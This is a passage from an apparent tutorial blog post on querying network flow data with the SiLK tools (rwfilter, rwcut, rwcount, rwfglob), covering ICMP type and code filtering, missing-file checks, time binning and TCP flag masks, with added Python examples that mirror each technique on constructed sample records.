<br />Leveraging <i>rwfilter</i> compression when creating files. Set the <i>--compression-method </i>to <i>best</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --protocol=0- \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><b><span style="color: #fcff01;"><span>--type=all --max-pass=100 --compression-method=best</span><span> </span><span>--pass=compressed.rw</span></span></b>
</pre></td></tr></tbody></table></div>
</div><div><br />Review the files created by <b><i>rwfilter</i></b> to confirm the compression: the same 100 records take 1177 bytes compressed versus 8976 bytes uncompressed.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">ls *compressed* -l</span></b></span>
<span style="color: white;">-rw-rw-r-- 1 sans sans 1177 Jun 13 01:51 compressed.rw</span>
<span style="color: white;">-rw-rw-r-- 1 sans sans 8976 Jun 13 01:51 uncompressed.rw</span>
</pre></td></tr></tbody></table></div>
</div><div><br />Find echo replies by leveraging the <b><i>rwfilter</i></b> <i>--icmp-type</i> and <i>--icmp-code </i>parameters. Specifically look at ICMP type 0 and code 0. Both ICMP (protocol 1) and ICMPv6 (protocol 58) records are matched, as the pro column shows.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --icmp-type=0 --icmp-code=0 --type=all --max-pass=100000 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--pass-destination=stdout | rwcut --num-recs=4 --fields sip,dip,proto,packets,bytes --icmp-type-and-code</b></span>
<span style="color: white;"> sIP| dIP|pro| packets| bytes|sPort|dPort|</span>
<span style="color: white;"> fe80::250:56ff:fead:e8b6| ff02::2| 58| 1| 56| 0| 0|</span>
<span style="color: white;"> fe80::250:56ff:fead:445| ff02::2| 58| 1| 56| 0| 0|</span>
<span style="color: white;"> 66.35.60.78| 172.28.30.5| 1| 10| 920| 0| 0|</span>
<span style="color: white;"> 66.35.60.78| 172.28.30.2| 1| 15| 1380| 0| 0|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Note that <i>--fields</i> above does not list sport or dport, yet sPort and dPort columns appear in the output: <i>--icmp-type-and-code</i> makes <b><i>rwcut</i></b> show the ICMP type in the sPort column and the ICMP code in the dPort column. SiLK reuses the otherwise unused port fields of the flow record to carry the type and code; ICMP itself has no concept of ports. Trick question I ask at interviews, "<i>What protocol and port does Ping use TCP or UDP?</i>" :-) </div><div><br /></div><div>Are there any echo requests to match those replies?</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --icmp-type=8 --icmp-code=0 --type=all --max-pass=100000 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--pass-destination=stdout | rwcut --num-recs=4 --fields sip,dip,proto,packets,bytes --icmp-type-and-code</span></b></span>
<span style="color: white;"> sIP| dIP|pro| packets| bytes|sPort|dPort|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>That's interesting! No records returned for echo requests. How can that be?! Very interesting! Did I miss something? Leave me a note in the comment section.</div><div><br /></div><div>Looking at <i><b>rwfilter </b>--print-volume-statistics</i> to see if there are any clues as to why no records were returned. It reports the records, packets and bytes read, how many passed and failed, and the number of repository files scanned.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~$ </span><span style="color: #fcff01;"><b>rwfilter --start=2022/01/05 --end=2022/07/01T23 --icmp-type=8 --icmp-code=0 --type=all --max-pass=100000 --print-volume-statistics</b></span>
<span style="color: white;"> | Recs| Packets| Bytes| Files|</span>
<span style="color: white;">Total| 25713809| 688813257| 402383908447| 13064|</span>
<span style="color: white;"> Pass| 0| 0| 0| |</span>
<span style="color: white;"> Fail| 25713809| 688813257| 402383908447| |</span>
</pre></td></tr></tbody></table></div>
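<div><br /></div><div>To make the sPort/dPort behaviour for ICMP concrete, and to answer the "is there a request for every reply" question on exported text when SiLK is not on the box, here is an added example written for this post; it is not SiLK code and not part of the original post. It relies on one documented SiLK detail: for ICMP and ICMPv6 records the type and code are packed into the record's destination port field as <i>(type &lt;&lt; 8) | code</i>, which is what <i>--icmp-type-and-code</i> unpacks into the sPort and dPort columns. The flow lines are constructed in the shape of <i>rwcut --no-columns</i> output taken without <i>--icmp-type-and-code</i>, so dPort still holds the packed value, and the function names are my own.</div><div><br /></div>

```python
"""Added example (not from the original post, not SiLK code): unpack the ICMP
type/code that SiLK stores in the dPort field, and pair echo replies with the
echo requests that should precede them."""

# Constructed sample in the shape of
# `rwcut --fields sip,dip,proto,dport,packets,bytes --no-columns` output,
# taken WITHOUT --icmp-type-and-code so dPort still holds the packed value.
# The addresses and counts are made up for this example.
SAMPLE_FLOWS = """\
sIP|dIP|pro|dPort|packets|bytes|
192.168.2.166|192.168.2.1|1|2048|10|840|
192.168.2.1|192.168.2.166|1|0|10|840|
66.35.60.78|172.28.30.5|1|0|10|920|
10.0.0.5|10.0.0.9|1|771|1|56|
10.0.0.5|10.0.0.9|6|443|12|1500|
"""

ICMP_PROTOCOLS = {1, 58}          # ICMP and ICMPv6
ECHO_REPLY, ECHO_REQUEST = 0, 8   # ICMPv4 message types


def decode_icmp(dport):
    """SiLK packs ICMP type/code into dPort as (type << 8) | code."""
    return (dport >> 8) & 0xFF, dport & 0xFF


def encode_icmp(icmp_type, icmp_code):
    """Inverse of decode_icmp; handy when building test records by hand."""
    return (icmp_type << 8) | icmp_code


def parse_rwcut(text):
    """Turn rwcut --no-columns output into a list of dicts keyed by header name."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header = [h.strip() for h in lines[0].rstrip("|").split("|")]
    return [dict(zip(header, [f.strip() for f in ln.rstrip("|").split("|")]))
            for ln in lines[1:]]


def icmp_flows(records):
    """Keep ICMP/ICMPv6 records and attach the unpacked type and code.
    TCP/UDP records are skipped: for them dPort really is a port."""
    out = []
    for rec in records:
        if int(rec["pro"]) not in ICMP_PROTOCOLS:
            continue
        icmp_type, icmp_code = decode_icmp(int(rec["dPort"]))
        out.append({**rec, "type": icmp_type, "code": icmp_code})
    return out


def orphan_replies(records):
    """Echo replies (type 0) for which no echo request (type 8) was seen in
    the reverse direction. Returns the (sip, dip) pairs of those replies."""
    flows = icmp_flows(records)
    requests = {(f["sIP"], f["dIP"]) for f in flows if f["type"] == ECHO_REQUEST}
    return [(f["sIP"], f["dIP"]) for f in flows
            if f["type"] == ECHO_REPLY and (f["dIP"], f["sIP"]) not in requests]


if __name__ == "__main__":
    recs = parse_rwcut(SAMPLE_FLOWS)
    for f in icmp_flows(recs):
        print(f"{f['sIP']:>16} -> {f['dIP']:<16} type {f['type']:>3} code {f['code']:>3}")
    print("replies without a request:", orphan_replies(recs))
```

<div>In the sample, dPort 2048 decodes to type 8 code 0 (echo request), 0 to type 0 code 0 (echo reply) and 771 to type 3 code 3 (destination unreachable, port unreachable), while the TCP record to port 443 is left alone. The reply from 66.35.60.78 has no matching request in the data and is reported as an orphan; on real data the same situation is the cue to check, as the page does next, which repository files the query actually read.</div>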
</div><div><br /></div><div>Going back further in time, just to see what the ICMP echo request output looks like.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start=2012/01/05 --end=2022/07/01T23 --icmp-type=8 --icmp-code=0 --type=all --max-pass=100000</span></b></span><b><span style="color: #fcff01;">
<span>--pass-destination=stdout | rwcut --num-recs=4 --fields sip,dip,proto,packets,bytes --icmp-type-and-code</span></span></b>
<span style="color: white;"> sIP| dIP|pro| packets| bytes|sPort|dPort|</span>
<span style="color: white;"> 192.168.2.166| 192.168.2.1| 1| 31| 2604| 8| 0|</span>
<span style="color: white;"> 192.168.2.166| 192.168.2.1| 1| 9| 756| 8| 0|</span>
<span style="color: white;"> 192.168.2.166| 192.168.2.1| 1| 10| 840| 8| 0|</span>
<span style="color: white;"> 192.168.2.166| 192.168.2.1| 1| 30| 2520| 8| 0|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>We now see four records of ICMP Type 8 and Code 0, all from 192.168.2.166 to 192.168.2.1.</div><div><br /></div><div>Get the filenames via <i><b>rwfilter </b>--print-filenames</i>, which lists every repository file the filter reads.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--icmp-type=8 --icmp-code=0 --type=all --max-pass=100000 --print-volume-statistics \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--print-filenames | more</span></b></span>
<span style="color: white;">/data/in/2022/02/08/in-internal_20220208.14</span>
<span style="color: white;">/data/out/2022/02/08/out-internal_20220208.14</span>
<span style="color: white;">/data/inweb/2022/02/08/iw-internal_20220208.14</span>
<span style="color: white;">/data/ext2ext/2022/02/08/ext2ext-internal_20220208.14</span>
<span style="color: white;">...</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Find the missing files via <i><b>rwfilter </b>--print-missing-files</i>. These are files the date range and <i>--type=all</i> would select but that do not exist in the repository, which matters when a query returns nothing: a gap in collection looks the same as an absence of traffic.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --icmp-type=8 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--icmp-code=0 --type=all --max-pass=100000 --print-volume-statistics \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--print-missing-files | more</b></span>
<span style="color: white;">Missing /data/out/2022/01/20/out-Internal_20220120.13</span>
<span style="color: white;">Missing /data/out/2022/01/20/out-Perimeter_20220120.13</span>
<span style="color: white;">Missing /data/out/2022/01/20/out-ERS_20220120.13</span>
<span style="color: white;">Missing /data/out/2022/01/20/out-internal_20220120.13</span>
<span style="color: white;">Missing /data/inweb/2022/01/20/iw-Internal_20220120.13</span>
<span style="color: white;">Missing /data/inweb/2022/01/20/iw-Perimeter_20220120.13</span>
<span style="color: white;">...</span>
</pre></td></tr></tbody></table></div>
</div><div>Leveraging <b><i>rwfglob</i></b> to see how many files a date range covers; <i>--no-file-names</i> suppresses the file names and prints only the summary count.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~/nik$ <b>rwfglob --start-date=2012/01/01 --end-date=2022/07/01 \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><b>--no-file-names</b></span>
<span style="color: white;">globbed 24574 files; 0 on tape</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Revisiting <b><i>rwcount</i></b> bin sizes from the time perspective. Below shows the bins at a 30-second interval (the timestamps step by half a minute). This seems to be the default <i>--bin-size</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --dport=443 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--type=all --max-pass=5 --pass-destination=stdout | rwcount</b></span>
<span style="color: white;"> Date| Records| Bytes| Packets|</span>
<span style="color: white;">2022/02/08T15:28:30| 1.00| 6390.00| 5.00|</span>
<span style="color: white;">2022/02/08T15:29:00| 0.00| 0.00| 0.00|</span>
<span style="color: white;">2022/02/08T15:29:30| 0.00| 0.00| 0.00|</span>
<span style="color: white;">2022/02/08T15:30:00| 0.00| 0.00| 0.00|</span>
<span style="color: white;">2022/02/08T15:30:30| 0.00| 0.00| 0.00|</span>
<span style="color: white;">2022/02/08T15:31:00| 0.00| 0.00| 0.00|</span>
<span style="color: white;">2022/02/08T15:31:30| 1.00| 6390.00| 5.00|</span>
<span style="color: white;">2022/02/08T15:32:00| 0.00| 0.00| 0.00|</span>
<span style="color: white;">2022/02/08T15:32:30| 3.00| 19170.00| 15.00|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Adjusting the <i><b>rwcount </b>--bin-size</i>, using shell arithmetic to express the size in seconds. Changing the <i>--bin-size</i> to a two-minute interval.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --dport=443 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--type=all --max-pass=5 --pass-destination=stdout | rwcount --bin-size=$((2*60))</b></span>
<span style="color: white;"> Date| Records| Bytes| Packets|</span>
<span style="color: white;">2022/02/08T15:28:00| 1.00| 6390.00| 5.00|</span>
<span style="color: white;">2022/02/08T15:30:00| 1.00| 6390.00| 5.00|</span>
<span style="color: white;">2022/02/08T15:32:00| 3.00| 19170.00| 15.00|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Changing the <i>--bin-size</i> to a five-minute interval.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --dport=443 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--type=all --max-pass=5 --pass-destination=stdout | rwcount --bin-size=$((5*60))</b></span>
<span style="color: white;"> Date| Records| Bytes| Packets|</span>
<span style="color: white;">2022/02/08T15:25:00| 1.00| 6390.00| 5.00|</span>
<span style="color: white;">2022/02/08T15:30:00| 4.00| 25560.00| 20.00|</span>
</pre></td></tr></tbody></table></div>
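<div>As an added example (not code from this post or from SiLK), here is the binning logic behind the three <b><i>rwcount</i></b> tables above, written in Python. The five flow records are constructed so that bin sizes of 30, 120 and 300 seconds reproduce the counts shown; each record is credited to the bin holding its start time, which is assumed to match <i>rwcount --load-scheme=1</i> rather than the default scheme that spreads a record's volume across the bins it spans.</div>

```python
"""Bin flow records by start time the way rwcount does with --bin-size.

Added example, not part of the original post or the SiLK distribution.
Records are constructed so that the three tables above (bin sizes 30,
120 and 300 seconds) come out; each record is credited to the bin
holding its start time (assumed equivalent to rwcount --load-scheme=1).
"""
from datetime import datetime, timedelta
from typing import Iterable, List, Tuple

# Constructed flow records (stime, bytes, packets); the times are chosen
# to land in the bins shown in the rwcount output above.
FLOWS = [
    (datetime(2022, 2, 8, 15, 28, 41), 6390, 5),
    (datetime(2022, 2, 8, 15, 31, 37), 6390, 5),
    (datetime(2022, 2, 8, 15, 32, 44), 6390, 5),
    (datetime(2022, 2, 8, 15, 32, 50), 6390, 5),
    (datetime(2022, 2, 8, 15, 32, 58), 6390, 5),
]

EPOCH = datetime(1970, 1, 1)


def bin_start(ts: datetime, bin_size: int) -> datetime:
    """Floor a timestamp to the start of its bin. Bins are counted from
    the Unix epoch, which is why a 300 s bin starts at 15:25:00."""
    if bin_size <= 0:
        raise ValueError("bin_size must be a positive number of seconds")
    secs = int((ts - EPOCH).total_seconds())
    return EPOCH + timedelta(seconds=secs - secs % bin_size)


def rwcount(flows: Iterable[Tuple[datetime, int, int]], bin_size: int = 30,
            skip_zeroes: bool = False) -> List[Tuple[datetime, int, int, int]]:
    """Return [(bin_start, records, bytes, packets)] for every bin from the
    first to the last populated one. Empty bins are emitted unless
    skip_zeroes is set (the behaviour of rwcount --skip-zeroes)."""
    totals = {}
    for stime, nbytes, npkts in flows:
        key = bin_start(stime, bin_size)
        rec, byt, pkt = totals.get(key, (0, 0, 0))
        totals[key] = (rec + 1, byt + nbytes, pkt + npkts)
    if not totals:
        return []
    rows = []
    cur, last = min(totals), max(totals)
    step = timedelta(seconds=bin_size)
    while cur <= last:
        rec, byt, pkt = totals.get(cur, (0, 0, 0))
        if rec or not skip_zeroes:
            rows.append((cur, rec, byt, pkt))
        cur += step
    return rows


def render(rows) -> str:
    """Format the rows roughly like rwcount's default text output."""
    out = ["               Date|  Records|      Bytes|  Packets|"]
    for start, rec, byt, pkt in rows:
        out.append(f"{start.strftime('%Y/%m/%dT%H:%M:%S')}|"
                   f"{rec:9.2f}|{byt:11.2f}|{pkt:9.2f}|")
    return "\n".join(out)


if __name__ == "__main__":
    for size in (30, 2 * 60, 5 * 60):
        print(f"--bin-size={size}")
        print(render(rwcount(FLOWS, size)))
```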
</div><div><br /></div><div>Using a time range via <i><b>rwfilter </b>--stime</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/02/09T16 --stime=2022/02/09T16:00:00-2022/02/09T16:02:00 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--type=all --pass-destination=stdout --protocol=0- | rwcut --fields=stime,sip,dip</span></b></span>
<span style="color: white;"> sTime| sIP| dIP|</span>
<span style="color: white;">2022/02/09T16:00:19.850| 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;">2022/02/09T16:00:35.377| 17.253.26.125| 172.28.10.137|</span>
<span style="color: white;">2022/02/09T16:01:29.106| 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;">2022/02/09T16:01:29.817| 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;">2022/02/09T16:00:19.850| 172.28.10.137| 8.8.8.8|</span>
<span style="color: white;">2022/02/09T16:00:35.377| 172.28.10.137| 17.253.26.125|</span>
<span style="color: white;">2022/02/09T16:01:29.106| 172.28.10.137| 8.8.8.8|</span>
<span style="color: white;">2022/02/09T16:01:29.817| 172.28.10.137| 8.8.8.8|</span>
<span style="color: white;">2022/02/09T16:01:29.214| 52.109.20.75| 172.28.30.4|</span>
<span style="color: white;">2022/02/09T16:01:29.892| 52.109.8.20| 172.28.30.4|</span>
<span style="color: white;">2022/02/09T16:01:29.892| 52.109.8.20| 172.28.30.4|</span>
<span style="color: white;">2022/02/09T16:00:19.852| 72.21.81.240| 172.28.10.25|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Find completed flows by looking at the <i>SYN</i>, <i>ACK</i>, <i>FIN</i> and <i>RST</i> flags: a flow passes when SYN, ACK and FIN are all set, or when SYN, ACK and RST are all set. Note the <i>--flags-all=SAF/SAF,SAR/SAR</i> parameter for <b><i>rwfilter</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/02/09T16 --type=all --pass-destination=stdout --protocol=6 --flags-all=SAF/SAF,SAR/SAR | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>rwcut --fields=stime,sip,dip,flags --num-recs=5</b></span>
<span style="color: white;"> sTime| sIP| dIP| flags|</span>
<span style="color: white;">2022/02/09T16:00:19.852| 72.21.81.240| 172.28.10.25|FS PA |</span>
<span style="color: white;">2022/02/09T16:05:25.018| 52.167.17.97| 172.28.30.5|FS PA |</span>
<span style="color: white;">2022/02/09T16:02:31.816| 52.167.249.196| 172.28.10.89|FS PA E |</span>
<span style="color: white;">2022/02/09T16:02:39.571| 142.250.72.10| 172.28.30.5|FS PA |</span>
<span style="color: white;">2022/02/09T16:03:15.843| 142.250.72.35| 172.28.50.2|FS PA |</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Print <b><i>rwcut</i></b> TCP flags as integers via <i>--integer-tcp-flags</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/02/09T16 --type=all --pass-destination=stdout --protocol=6 --flags-all=SAF/SAF,SAR/SAR | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>rwcut --fields=stime,sip,dip,flags --num-recs=5 --integer-tcp-flags</b></span>
<span style="color: white;"> sTime| sIP| dIP|fla|</span>
<span style="color: white;">2022/02/09T16:00:19.852| 72.21.81.240| 172.28.10.25| 27|</span>
<span style="color: white;">2022/02/09T16:05:25.018| 52.167.17.97| 172.28.30.5| 27|</span>
<span style="color: white;">2022/02/09T16:02:31.816| 52.167.249.196| 172.28.10.89| 91|</span>
<span style="color: white;">2022/02/09T16:02:39.571| 142.250.72.10| 172.28.30.5| 27|</span>
<span style="color: white;">2022/02/09T16:03:15.843| 142.250.72.35| 172.28.50.2| 27|</span>
</pre></td></tr></tbody></table></div>
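<div>To make the integer flag values above concrete, here is an added Python example (not from this post or from SiLK) that renders an integer flags field the way <b><i>rwcut</i></b> prints it and applies the HIGH/MASK logic of <i>--flags-all=SAF/SAF,SAR/SAR</i> to constructed records; two half-open records (SYN/ACK only, RST only) are included to show what the completed-flow filter drops.</div>

```python
"""Decode SiLK integer TCP flags and evaluate an rwfilter --flags-all mask.

Added example, not part of the original post or the SiLK distribution.
It reproduces the flag letters rwcut prints (FSRPAUEC order, one fixed
position per flag) and the HIGH/MASK semantics of --flags-all.
"""
from typing import Iterable, List, Tuple

# Bit values of the TCP flags, in the order SiLK prints them.
FLAG_BITS = (
    ("F", 0x01),  # FIN
    ("S", 0x02),  # SYN
    ("R", 0x04),  # RST
    ("P", 0x08),  # PSH
    ("A", 0x10),  # ACK
    ("U", 0x20),  # URG
    ("E", 0x40),  # ECE
    ("C", 0x80),  # CWR
)
LETTER_TO_BIT = dict(FLAG_BITS)


def flags_to_silk(value: int) -> str:
    """Render an integer flags field as rwcut does without
    --integer-tcp-flags: the letter if the bit is set, a space if not."""
    return "".join(letter if value & bit else " " for letter, bit in FLAG_BITS)


def silk_to_flags(text: str) -> int:
    """Inverse of flags_to_silk; spaces and unknown characters are ignored."""
    value = 0
    for letter in text.upper():
        value |= LETTER_TO_BIT.get(letter, 0)
    return value


def parse_flags_all(spec: str) -> List[Tuple[int, int]]:
    """Parse 'HIGH/MASK[,HIGH/MASK...]' into (high, mask) bit pairs.

    MASK names the flags examined; HIGH names those that must be set.
    Flags in MASK but not in HIGH must be clear, so S/SA means SYN set
    and ACK clear. HIGH must be a subset of MASK."""
    pairs = []
    for item in spec.split(","):
        high_txt, sep, mask_txt = item.strip().partition("/")
        if not sep:
            raise ValueError(f"missing '/' in {item!r}")
        high, mask = silk_to_flags(high_txt), silk_to_flags(mask_txt)
        if high & ~mask:
            raise ValueError(f"HIGH is not a subset of MASK in {item!r}")
        pairs.append((high, mask))
    return pairs


def passes_flags_all(flags: int, pairs: Iterable[Tuple[int, int]]) -> bool:
    """A record passes when any HIGH/MASK pair matches (pairs are ORed)."""
    return any((flags & mask) == high for high, mask in pairs)


def filter_records(records, spec: str):
    """Apply a --flags-all spec to (stime, sip, dip, flags) tuples and
    return the passing records with the flags rendered as rwcut does."""
    pairs = parse_flags_all(spec)
    return [(stime, sip, dip, flags_to_silk(fl))
            for stime, sip, dip, fl in records
            if passes_flags_all(fl, pairs)]


# Constructed sample records: the two integer values seen above (27, 91),
# plus a half-open handshake (SYN/ACK only) and a reset-only record that
# the completed-flow filter should drop.
SAMPLE = [
    ("2022/02/09T16:00:19.852", "72.21.81.240", "172.28.10.25", 27),
    ("2022/02/09T16:02:31.816", "52.167.249.196", "172.28.10.89", 91),
    ("2022/02/09T16:02:40.000", "192.0.2.10", "172.28.30.5", 0x12),
    ("2022/02/09T16:02:41.000", "192.0.2.11", "172.28.30.5", 0x04),
]

if __name__ == "__main__":
    for rec in filter_records(SAMPLE, "SAF/SAF,SAR/SAR"):
        print("|".join(rec))
```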
</div><div><br /></div><div>Change <b><i>rwcut </i></b>format of the IP address to decimal via <i>--ip-format=decimal</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/02/09T16 --type=all --pass-destination=stdout \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=6 | rwcut --fields=sip,dip --num-recs=5 --ip-format=decimal</span></b></span>
<span style="color: white;"> sIP| dIP|</span>
